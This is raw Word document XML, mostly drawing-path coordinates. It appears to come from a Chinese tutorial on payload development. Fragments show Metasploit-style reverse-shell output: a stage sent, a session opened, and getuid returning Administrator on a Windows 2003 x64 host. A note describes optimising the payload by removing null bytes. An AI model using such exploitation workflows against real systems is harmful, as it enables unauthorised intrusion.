,4961,3445,4961,3445,4961,3445,4961,3445,4961,3445,4961,3445,4961,3445,4961,3445,4961,3445,4961,3444,4961,3444,4961,3444,4961,3444,4961,3443,4961,3443,4961,3443,4961,3442,4961,3442,4961,3442,4961,3441,4961,3441,4961,3440,4961,3440,4961,3439,4961,3439,4961,3438,4961,3437,4961,3437,4961,3436,4961,3435,4961,3435,4961,3434,4961,3433,4961,3432,4961,3431,4961,3430,4961,3429,4961,3428,4961,3427,4961,3426,4961,3424,4961,3423,4961,3422,4961,3421,4961,3419,4961,3418,4961,3416,4961,3415,4961,3413,4961,3411,4961,3410,4961,3408,4961,3406,4961,3404,4961,3402,4961,3400,4961,3398,4961,3396,4961,3394,4961,3392,4961,3389,4961,3387,4961,3384,4961,3382,4961,3379,4961,3377,4961,3374,4961,3371,4961,3368,4961,3365,4961,3362,4961,3359,4961,3356,4961,3353,4961,3349,4961,3346,4961,3343,4961,3339,4961,3335,4961,3332,4961,3328,4961,3324,4961,3320,4961,3316,4961,3312,4961,3308,4961,3303,4961,3299,4961,3294,4961,3290,4961,3285,4961,3280,4961,3275,4961,3270,4961,3265,4961,3260,4961,3255,4961,3250,4961,3244,4961,3239,4961,3233,4961,3227,4961,3221,4961,3215,4961,3209,4961,3203,4961,3197,4961,3191e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:264.874pt;margin-top:157.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5297,3157" coordsize="142,282">
        <v:shape style="position:absolute;left:5297;top:3157;width:142;height:282" coordorigin="5297,3157" coordsize="142,282" path="m5322,3191l5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5322,3191,5323,3191,5323,3191,5323,3191,5323,3191,5323,3191,5323,3191,5323,3191,5324,3191,5324,3191,5324,3191,5324,3191,5324,3191,5325,3191,5325,3191,5325,3191,5326,3191,5326,3191,5326,3191,5327,3191,5327,3191,5327,3191,5328,3191,5328,3191,5329,3191,5329,3191,5330,3191,5330,3191,5331,3191,5331,3191,5332,3191,5332,3191,5333,3191,5334,3191,5334,3191,5335,3191,5336,3191,5336,3191,5337,3191,5338,3191,5339,3191,5339,3191,5340,3191,5341,3191,5342,3191,5343,3191,5344,3191,5345,3191,5346,3191,5347,3191,5348,3191,5349,3191,5351,3191,5352,3191,5353,3191,5354,3191,5355,3191,5357,3191,5358,3191,5360,3191,5361,3191,5362,3191,5364,3191,5365,3191,5367,3191,5369,3191,5370,3191,5372,3191,5374,3191,5375,3191,5377,3191,5379,3191,5381,3191,5383,3191,5385,3191,5387,3191,5389,3191,5391,3191,5393,3191,5395,3191,5397,3191,5400,3191,5402,3191,5404,3191,5407,3191,5409,3191,5411,3191,5414,3191,5417,3191,5419,3191,5422,3191,5424,3191,5427,3191,5430,3191,5433,3191,5436,3191,5439,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3191,5442,3192,5442,3192,5442,3192,5442,3192,5442,3192,5442,3193,5442,3193,5442,3193,5442,3194,5442,3194,5442,3194,5442,3195,5442,3195,5442,3196,5442,3196,5442,3197,5442,3197,5442,3198,5442,3198,5442,3199,5442,3200,5442,3200,5442,3201,5442,3202,5442,3203,5442,3203,5442,3204,5442,3205,5442,3206,5442,3207,5442,3208,5442,3210,5442,3211,5442,3212,5442,3213,5442,3214,5442,3216,5442,3217,5442,3219,5442,3220,5442,3222,5442,3223,5442,3225,5442,3227,5442,3228,5442,3230,5442,3232,5442,3234,5442,3236,5442,3238,5442,3240,5442,3243,5442,3245,5442,3247,5442,3249,5442,3252,5442,3254,5442,3257,5442,3260,5442,3262,5442,3265,5442,3268,5442,3271,5442,3274,5442,3277,5442,3280,5442,3284,5442,3287,5442,3290,5442,3294,5442,3297,5442,3301,5442,3305,5442,3308,5442,3312,5442,3316,5442,3320,5442,3325,5442,3329,5442,3333,5442,3338,5442,3342,5442,3347,5442,3351,5442,3356,5442,3361,5442,3366,5442,3371,5442,3376,5442,3381,5442,3387,5442,3392,5442,3398,5442,3403,5442,3409,5442,3415,5442,3421,5442,3427,5442,3433,5442,3439,5442,3446,5442,3446,5442,3446,5442,3446,5442,3446,5442,3446,5442,3446,5442,3446,5442,3446,5442,3446,5442,3446,5442,3446,5442,3446,5442,3446,5442,3446,5442,3446,5442,3446,5441,3446,5441,3446,5441,3446,5441,3446,5441,3446,5441,3446,5441,3446,5441,3446,5441,3446,5441,3446,5440,3446,5440,3446,5440,3446,5440,3446,5440,3446,5440,3446,5439,3446,5439,3446,5439,3446,5439,3446,5438,3446,5438,3446,5438,3446,5438,3446,5437,3446,5437,3446,5436,3446,5436,3446,5436,3446,5435,3446,5435,3446,5434,3446,5434,3446,5433,3446,5433,3446,5432,3446,5432,3446,5431,3446,5431,3446,5430,3446,5429,3446,5429,3446,5428,3446,5427,3446,5426,3446,5426,3446,5425,3446,5424,3446,5423,3446,5422,3446,5421,3446,5420,3446,5419,3446,5418,3446,5417,3446,5416,3446,5415,3446,5414,3446,5413,3446,5412,3446,5410,3446,5409,3446,5408,3446,5407,3446,5405,3446,5404,3446,5402,3446,5401,3446,5400,3446,5398,3446,5396,3446,5395,3446,5393,3446,5392,3446,5390,3446,5388,3446,5386,3446,5384,3446,5383,3446,5381,3446,5379,3446,5377,3446,5375,3446,5373,3446,5370,3446,5368,3446,5366,3446,5364,3446,5362,3446,5359,3446,5357,3446,5354,3446,5352,3446,5349,3446,5347,3446,5344,3446,5342,3446,5339,3446,5336,3446,5333,3446,5331,3446,5328,3446,5325,3446,5322,3446,5322,3446,5322,3446,5322,3446,5322,3446,5322,3446,5322,3446,5322,3446,5322,3446,5322,3446,5322,3446,5322,3446,5322,3446,5322,3445,5322,3445,5322,3445,5322,3445,5322,3445,5322,3445,5322,3445,5322,3445,5322,3445,5322,3444,5322,3444,5322,3444,5322,3444,5322,3443,5322,3443,5322,3443,5322,3442,5322,3442,5322,3442,5322,3441,5322,3441,5322,3440,5322,3440,5322,3439,5322,3439,5322,3438,5322,3437,5322,3437,5322,3436,5322,3435,5322,3435,5322,3434,5322,3433,5322,3432,5322,3431,5322,3430,5322,3429,5322,3428,5322,3427,5322,3426,5322,3424,5322,3423,5322,3422,5322,3421,5322,3419,5322,3418,5322,3416,5322,3415,5322,3413,5322,3411,5322,3410,5322,3408,5322,3406,5322,3404,5322,3402,5322,3400,5322,3398,5322,3396,5322,3394,5322,3392,5322,3389,5322,3387,5322,3384,5322,3382,5322,3379,5322,3377,5322,3374,5322,3371,5322,3368,5322,3365,5322,3362,5322,3359,5322,3356,5322,3353,5322,3349,5322,3346,5322,3343,5322,3339,5322,3335,5322,3332,5322,3328,5322,3324,5322,3320,5322,3316,5322,3312,5322,3308,5322,3303,5322,3299,5322,3294,5322,3290,5322,3285,5322,3280,5322,3275,5322,3270,5322,3265,5322,3260,5322,3255,5322,3250,5322,3244,5322,3239,5322,3233,5322,3227,5322,3221,5322,3215,5322,3209,5322,3203,5322,3197,5322,3191e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:342.874pt;margin-top:157.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6857,3157" coordsize="142,282">
        <v:shape style="position:absolute;left:6857;top:3157;width:142;height:282" coordorigin="6857,3157" coordsize="142,282" path="m6882,3191l6882,3191,6882,3191,6882,3191,6882,3191,6882,3191,6882,3191,6882,3191,6882,3191,6883,3191,6883,3191,6883,3191,6883,3191,6883,3191,6883,3191,6883,3191,6883,3191,6883,3191,6883,3191,6883,3191,6883,3191,6883,3191,6883,3191,6883,3191,6883,3191,6883,3191,6884,3191,6884,3191,6884,3191,6884,3191,6884,3191,6884,3191,6885,3191,6885,3191,6885,3191,6885,3191,6886,3191,6886,3191,6886,3191,6886,3191,6887,3191,6887,3191,6887,3191,6888,3191,6888,3191,6889,3191,6889,3191,6889,3191,6890,3191,6890,3191,6891,3191,6891,3191,6892,3191,6892,3191,6893,3191,6894,3191,6894,3191,6895,3191,6896,3191,6896,3191,6897,3191,6898,3191,6899,3191,6899,3191,6900,3191,6901,3191,6902,3191,6903,3191,6904,3191,6905,3191,6906,3191,6907,3191,6908,3191,6909,3191,6910,3191,6911,3191,6913,3191,6914,3191,6915,3191,6916,3191,6918,3191,6919,3191,6920,3191,6922,3191,6923,3191,6925,3191,6926,3191,6928,3191,6929,3191,6931,3191,6933,3191,6934,3191,6936,3191,6938,3191,6940,3191,6942,3191,6944,3191,6946,3191,6947,3191,6950,3191,6952,3191,6954,3191,6956,3191,6958,3191,6960,3191,6963,3191,6965,3191,6967,3191,6970,3191,6972,3191,6975,3191,6977,3191,6980,3191,6983,3191,6985,3191,6988,3191,6991,3191,6994,3191,6997,3191,7000,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3191,7003,3192,7003,3192,7003,3192,7003,3192,7003,3192,7003,3193,7003,3193,7003,3193,7003,3194,7003,3194,7003,3194,7003,3195,7003,3195,7003,3196,7003,3196,7003,3197,7003,3197,7003,3198,7003,3198,7003,3199,7003,3200,7003,3200,7003,3201,7003,3202,7003,3203,7003,3203,7003,3204,7003,3205,7003,3206,7003,3207,7003,3208,7003,3210,7003,3211,7003,3212,7003,3213,7003,3214,7003,3216,7003,3217,7003,3219,7003,3220,7003,3222,7003,3223,7003,3225,7003,3227,7003,3228,7003,3230,7003,3232,7003,3234,7003,3236,7003,3238,7003,3240,7003,3243,7003,3245,7003,3247,7003,3249,7003,3252,7003,3254,7003,3257,7003,3260,7003,3262,7003,3265,7003,3268,7003,3271,7003,3274,7003,3277,7003,3280,7003,3284,7003,3287,7003,3290,7003,3294,7003,3297,7003,3301,7003,3305,7003,3308,7003,3312,7003,3316,7003,3320,7003,3325,7003,3329,7003,3333,7003,3338,7003,3342,7003,3347,7003,3351,7003,3356,7003,3361,7003,3366,7003,3371,7003,3376,7003,3381,7003,3387,7003,3392,7003,3398,7003,3403,7003,3409,7003,3415,7003,3421,7003,3427,7003,3433,7003,3439,7003,3446,7003,3446,7003,3446,7003,3446,7003,3446,7003,3446,7003,3446,7003,3446,7003,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7002,3446,7001,3446,7001,3446,7001,3446,7001,3446,7001,3446,7001,3446,7000,3446,7000,3446,7000,3446,7000,3446,6999,3446,6999,3446,6999,3446,6999,3446,6998,3446,6998,3446,6998,3446,6997,3446,6997,3446,6996,3446,6996,3446,6996,3446,6995,3446,6995,3446,6994,3446,6994,3446,6993,3446,6993,3446,6992,3446,6991,3446,6991,3446,6990,3446,6989,3446,6989,3446,6988,3446,6987,3446,6986,3446,6986,3446,6985,3446,6984,3446,6983,3446,6982,3446,6981,3446,6980,3446,6979,3446,6978,3446,6977,3446,6976,3446,6975,3446,6974,3446,6972,3446,6971,3446,6970,3446,6969,3446,6967,3446,6966,3446,6965,3446,6963,3446,6962,3446,6960,3446,6959,3446,6957,3446,6956,3446,6954,3446,6952,3446,6951,3446,6949,3446,6947,3446,6945,3446,6943,3446,6941,3446,6939,3446,6938,3446,6935,3446,6933,3446,6931,3446,6929,3446,6927,3446,6925,3446,6922,3446,6920,3446,6918,3446,6915,3446,6913,3446,6910,3446,6908,3446,6905,3446,6902,3446,6900,3446,6897,3446,6894,3446,6891,3446,6888,3446,6885,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3446,6882,3445,6882,3445,6882,3445,6882,3445,6882,3445,6882,3445,6882,3445,6882,3445,6882,3445,6882,3444,6882,3444,6882,3444,6882,3444,6882,3443,6882,3443,6882,3443,6882,3442,6882,3442,6882,3442,6882,3441,6882,3441,6882,3440,6882,3440,6882,3439,6882,3439,6882,3438,6882,3437,6882,3437,6882,3436,6882,3435,6882,3435,6882,3434,6882,3433,6882,3432,6882,3431,6882,3430,6882,3429,6882,3428,6882,3427,6882,3426,6882,3424,6882,3423,6882,3422,6882,3421,6882,3419,6882,3418,6882,3416,6882,3415,6882,3413,6882,3411,6882,3410,6882,3408,6882,3406,6882,3404,6882,3402,6882,3400,6882,3398,6882,3396,6882,3394,6882,3392,6882,3389,6882,3387,6882,3384,6882,3382,6882,3379,6882,3377,6882,3374,6882,3371,6882,3368,6882,3365,6882,3362,6882,3359,6882,3356,6882,3353,6882,3349,6882,3346,6882,3343,6882,3339,6882,3335,6882,3332,6882,3328,6882,3324,6882,3320,6882,3316,6882,3312,6882,3308,6882,3303,6882,3299,6882,3294,6882,3290,6882,3285,6882,3280,6882,3275,6882,3270,6882,3265,6882,3260,6882,3255,6882,3250,6882,3244,6882,3239,6882,3233,6882,3227,6882,3221,6882,3215,6882,3209,6882,3203,6882,3197,6882,3191e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:168.874pt;margin-top:192.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3377,3857" coordsize="142,282">
        <v:shape style="position:absolute;left:3377;top:3857;width:142;height:282" coordorigin="3377,3857" coordsize="142,282" path="m3416,3896l3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3416,3896,3417,3896,3417,3896,3417,3896,3417,3896,3417,3896,3417,3896,3417,3896,3418,3896,3418,3896,3418,3896,3418,3896,3419,3896,3419,3896,3419,3896,3419,3896,3420,3896,3420,3896,3420,3896,3421,3896,3421,3896,3421,3896,3422,3896,3422,3896,3423,3896,3423,3896,3424,3896,3424,3896,3425,3896,3425,3896,3426,3896,3426,3896,3427,3896,3428,3896,3428,3896,3429,3896,3430,3896,3430,3896,3431,3896,3432,3896,3433,3896,3434,3896,3434,3896,3435,3896,3436,3896,3437,3896,3438,3896,3439,3896,3440,3896,3441,3896,3442,3896,3443,3896,3445,3896,3446,3896,3447,3896,3448,3896,3450,3896,3451,3896,3452,3896,3454,3896,3455,3896,3456,3896,3458,3896,3459,3896,3461,3896,3463,3896,3464,3896,3466,3896,3468,3896,3469,3896,3471,3896,3473,3896,3475,3896,3477,3896,3479,3896,3481,3896,3483,3896,3485,3896,3487,3896,3489,3896,3491,3896,3494,3896,3496,3896,3498,3896,3501,3896,3503,3896,3505,3896,3508,3896,3511,3896,3513,3896,3516,3896,3519,3896,3521,3896,3524,3896,3527,3896,3530,3896,3533,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3896,3536,3897,3536,3897,3536,3897,3536,3897,3536,3897,3536,3897,3536,3898,3536,3898,3536,3898,3536,3898,3536,3899,3536,3899,3536,3899,3536,3900,3536,3900,3536,3900,3536,3901,3536,3901,3536,3902,3536,3902,3536,3903,3536,3904,3536,3904,3536,3905,3536,3906,3536,3906,3536,3907,3536,3908,3536,3909,3536,3910,3536,3911,3536,3912,3536,3913,3536,3914,3536,3915,3536,3916,3536,3917,3536,3918,3536,3920,3536,3921,3536,3923,3536,3924,3536,3925,3536,3927,3536,3929,3536,3930,3536,3932,3536,3934,3536,3936,3536,3938,3536,3939,3536,3941,3536,3944,3536,3946,3536,3948,3536,3950,3536,3952,3536,3955,3536,3957,3536,3960,3536,3962,3536,3965,3536,3968,3536,3971,3536,3973,3536,3976,3536,3979,3536,3983,3536,3986,3536,3989,3536,3992,3536,3996,3536,3999,3536,4003,3536,4006,3536,4010,3536,4014,3536,4018,3536,4022,3536,4026,3536,4030,3536,4034,3536,4038,3536,4043,3536,4047,3536,4052,3536,4057,3536,4061,3536,4066,3536,4071,3536,4076,3536,4081,3536,4087,3536,4092,3536,4097,3536,4103,3536,4109,3536,4114,3536,4120,3536,4126,3536,4132,3536,4138,3536,4145,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3536,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3535,4151,3534,4151,3534,4151,3534,4151,3534,4151,3534,4151,3533,4151,3533,4151,3533,4151,3533,4151,3532,4151,3532,4151,3532,4151,3532,4151,3531,4151,3531,4151,3531,4151,3530,4151,3530,4151,3529,4151,3529,4151,3528,4151,3528,4151,3527,4151,3527,4151,3526,4151,3526,4151,3525,4151,3525,4151,3524,4151,3523,4151,3523,4151,3522,4151,3521,4151,3520,4151,3520,4151,3519,4151,3518,4151,3517,4151,3516,4151,3515,4151,3514,4151,3513,4151,3512,4151,3511,4151,3510,4151,3509,4151,3508,4151,3507,4151,3506,4151,3505,4151,3503,4151,3502,4151,3501,4151,3499,4151,3498,4151,3496,4151,3495,4151,3494,4151,3492,4151,3490,4151,3489,4151,3487,4151,3486,4151,3484,4151,3482,4151,3480,4151,3478,4151,3477,4151,3475,4151,3473,4151,3471,4151,3469,4151,3467,4151,3465,4151,3462,4151,3460,4151,3458,4151,3456,4151,3453,4151,3451,4151,3449,4151,3446,4151,3444,4151,3441,4151,3438,4151,3436,4151,3433,4151,3430,4151,3427,4151,3425,4151,3422,4151,3419,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4151,3416,4150,3416,4150,3416,4150,3416,4150,3416,4150,3416,4150,3416,4149,3416,4149,3416,4149,3416,4149,3416,4148,3416,4148,3416,4148,3416,4147,3416,4147,3416,4147,3416,4146,3416,4146,3416,4145,3416,4145,3416,4144,3416,4143,3416,4143,3416,4142,3416,4141,3416,4141,3416,4140,3416,4139,3416,4138,3416,4137,3416,4136,3416,4135,3416,4134,3416,4133,3416,4132,3416,4131,3416,4130,3416,4129,3416,4127,3416,4126,3416,4124,3416,4123,3416,4122,3416,4120,3416,4118,3416,4117,3416,4115,3416,4113,3416,4111,3416,4110,3416,4108,3416,4106,3416,4103,3416,4101,3416,4099,3416,4097,3416,4095,3416,4092,3416,4090,3416,4087,3416,4085,3416,4082,3416,4079,3416,4076,3416,4074,3416,4071,3416,4068,3416,4065,3416,4061,3416,4058,3416,4055,3416,4051,3416,4048,3416,4044,3416,4041,3416,4037,3416,4033,3416,4029,3416,4025,3416,4021,3416,4017,3416,4013,3416,4009,3416,4004,3416,4000,3416,3995,3416,3990,3416,3986,3416,3981,3416,3976,3416,3971,3416,3966,3416,3960,3416,3955,3416,3950,3416,3944,3416,3938,3416,3933,3416,3927,3416,3921,3416,3915,3416,3909,3416,3902,3416,3896e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:168.874pt;margin-top:229.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3377,4597" coordsize="142,282">
        <v:shape style="position:absolute;left:3377;top:4597;width:142;height:282" coordorigin="3377,4597" coordsize="142,282" path="m3416,4631l3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3416,4631,3417,4631,3417,4631,3417,4631,3417,4631,3417,4631,3417,4631,3417,4631,3418,4631,3418,4631,3418,4631,3418,4631,3419,4631,3419,4631,3419,4631,3419,4631,3420,4631,3420,4631,3420,4631,3421,4631,3421,4631,3421,4631,3422,4631,3422,4631,3423,4631,3423,4631,3424,4631,3424,4631,3425,4631,3425,4631,3426,4631,3426,4631,3427,4631,3428,4631,3428,4631,3429,4631,3430,4631,3430,4631,3431,4631,3432,4631,3433,4631,3434,4631,3434,4631,3435,4631,3436,4631,3437,4631,3438,4631,3439,4631,3440,4631,3441,4631,3442,4631,3443,4631,3445,4631,3446,4631,3447,4631,3448,4631,3450,4631,3451,4631,3452,4631,3454,4631,3455,4631,3456,4631,3458,4631,3459,4631,3461,4631,3463,4631,3464,4631,3466,4631,3468,4631,3469,4631,3471,4631,3473,4631,3475,4631,3477,4631,3479,4631,3481,4631,3483,4631,3485,4631,3487,4631,3489,4631,3491,4631,3494,4631,3496,4631,3498,4631,3501,4631,3503,4631,3505,4631,3508,4631,3511,4631,3513,4631,3516,4631,3519,4631,3521,4631,3524,4631,3527,4631,3530,4631,3533,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4631,3536,4632,3536,4632,3536,4632,3536,4632,3536,4632,3536,4632,3536,4632,3536,4632,3536,4632,3536,4633,3536,4633,3536,4633,3536,4633,3536,4633,3536,4634,3536,4634,3536,4634,3536,4635,3536,4635,3536,4635,3536,4636,3536,4636,3536,4637,3536,4637,3536,4638,3536,4638,3536,4639,3536,4640,3536,4640,3536,4641,3536,4642,3536,4643,3536,4643,3536,4644,3536,4645,3536,4646,3536,4647,3536,4648,3536,4649,3536,4650,3536,4651,3536,4653,3536,4654,3536,4655,3536,4657,3536,4658,3536,4659,3536,4661,3536,4662,3536,4664,3536,4666,3536,4667,3536,4669,3536,4671,3536,4673,3536,4675,3536,4677,3536,4679,3536,4681,3536,4683,3536,4686,3536,4688,3536,4690,3536,4693,3536,4695,3536,4698,3536,4700,3536,4703,3536,4706,3536,4709,3536,4712,3536,4715,3536,4718,3536,4721,3536,4724,3536,4728,3536,4731,3536,4734,3536,4738,3536,4742,3536,4745,3536,4749,3536,4753,3536,4757,3536,4761,3536,4765,3536,4770,3536,4774,3536,4778,3536,4783,3536,4787,3536,4792,3536,4797,3536,4802,3536,4807,3536,4812,3536,4817,3536,4822,3536,4827,3536,4833,3536,4838,3536,4844,3536,4850,3536,4856,3536,4862,3536,4868,3536,4874,3536,4880,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3536,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3535,4886,3534,4886,3534,4886,3534,4886,3534,4886,3534,4886,3533,4886,3533,4886,3533,4886,3533,4886,3532,4886,3532,4886,3532,4886,3532,4886,3531,4886,3531,4886,3531,4886,3530,4886,3530,4886,3529,4886,3529,4886,3528,4886,3528,4886,3527,4886,3527,4886,3526,4886,3526,4886,3525,4886,3525,4886,3524,4886,3523,4886,3523,4886,3522,4886,3521,4886,3520,4886,3520,4886,3519,4886,3518,4886,3517,4886,3516,4886,3515,4886,3514,4886,3513,4886,3512,4886,3511,4886,3510,4886,3509,4886,3508,4886,3507,4886,3506,4886,3505,4886,3503,4886,3502,4886,3501,4886,3499,4886,3498,4886,3496,4886,3495,4886,3494,4886,3492,4886,3490,4886,3489,4886,3487,4886,3486,4886,3484,4886,3482,4886,3480,4886,3478,4886,3477,4886,3475,4886,3473,4886,3471,4886,3469,4886,3467,4886,3465,4886,3462,4886,3460,4886,3458,4886,3456,4886,3453,4886,3451,4886,3449,4886,3446,4886,3444,4886,3441,4886,3438,4886,3436,4886,3433,4886,3430,4886,3427,4886,3425,4886,3422,4886,3419,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4886,3416,4885,3416,4885,3416,4885,3416,4885,3416,4885,3416,4884,3416,4884,3416,4884,3416,4883,3416,4883,3416,4883,3416,4882,3416,4882,3416,4881,3416,4881,3416,4881,3416,4880,3416,4879,3416,4879,3416,4878,3416,4877,3416,4877,3416,4876,3416,4875,3416,4874,3416,4874,3416,4873,3416,4872,3416,4871,3416,4870,3416,4869,3416,4868,3416,4866,3416,4865,3416,4864,3416,4863,3416,4861,3416,4860,3416,4858,3416,4857,3416,4855,3416,4854,3416,4852,3416,4850,3416,4849,3416,4847,3416,4845,3416,4843,3416,4841,3416,4839,3416,4837,3416,4835,3416,4832,3416,4830,3416,4828,3416,4825,3416,4823,3416,4820,3416,4817,3416,4815,3416,4812,3416,4809,3416,4806,3416,4803,3416,4800,3416,4797,3416,4793,3416,4790,3416,4787,3416,4783,3416,4780,3416,4776,3416,4772,3416,4769,3416,4765,3416,4761,3416,4757,3416,4753,3416,4748,3416,4744,3416,4740,3416,4735,3416,4730,3416,4726,3416,4721,3416,4716,3416,4711,3416,4706,3416,4701,3416,4696,3416,4690,3416,4685,3416,4679,3416,4674,3416,4668,3416,4662,3416,4656,3416,4650,3416,4644,3416,4638,3416,4631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6" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5511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Started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reverse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Sending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stage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179779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bytes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.119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3710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session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opened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3891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2019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01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27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14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46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20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0500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="137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6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getuid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11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Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="12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username: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WIN03X64\Administrator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getpid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7702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pid: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1232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第三次优化p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ayload：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在00000E60起含有大部分000h，充填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掉00，在次生成payload。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="295" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="1849" w:firstLine="0"/>
      </w:pP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3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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="104"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="104"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>000h,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="11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w w:val="44"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="44"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>..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735.95pt;width:0.0pt;height:106.904pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,14701" coordsize="0,2138">
        <v:shape style="position:absolute;left:10402;top:14701;width:0;height:2138" coordorigin="10402,14701" coordsize="0,2138" path="m10402,14701l10402,14701,10402,14701,10402,14701,10402,14701,10402,14701,10402,14702,10402,14702,10402,14702,10402,14702,10402,14702,10402,14703,10402,14703,10402,14704,10402,14704,10402,14705,10402,14706,10402,14707,10402,14708,10402,14709,10402,14710,10402,14712,10402,14713,10402,14715,10402,14717,10402,14719,10402,14721,10402,14724,10402,14726,10402,14729,10402,14732,10402,14736,10402,14739,10402,14743,10402,14747,10402,14751,10402,14756,10402,14761,10402,14766,10402,14771,10402,14777,10402,14783,10402,14789,10402,14795,10402,14802,10402,14809,10402,14817,10402,14825,10402,14833,10402,14842,10402,14851,10402,14860,10402,14870,10402,14880,10402,14890,10402,14901,10402,14913,10402,14924,10402,14936,10402,14949,10402,14962,10402,14975,10402,14989,10402,15004,10402,15019,10402,15034,10402,15050,10402,15066,10402,15083,10402,15100,10402,15118,10402,15137,10402,15156,10402,15175,10402,15195,10402,15216,10402,15237,10402,15258,10402,15281,10402,15304,10402,15327,10402,15351,10402,15376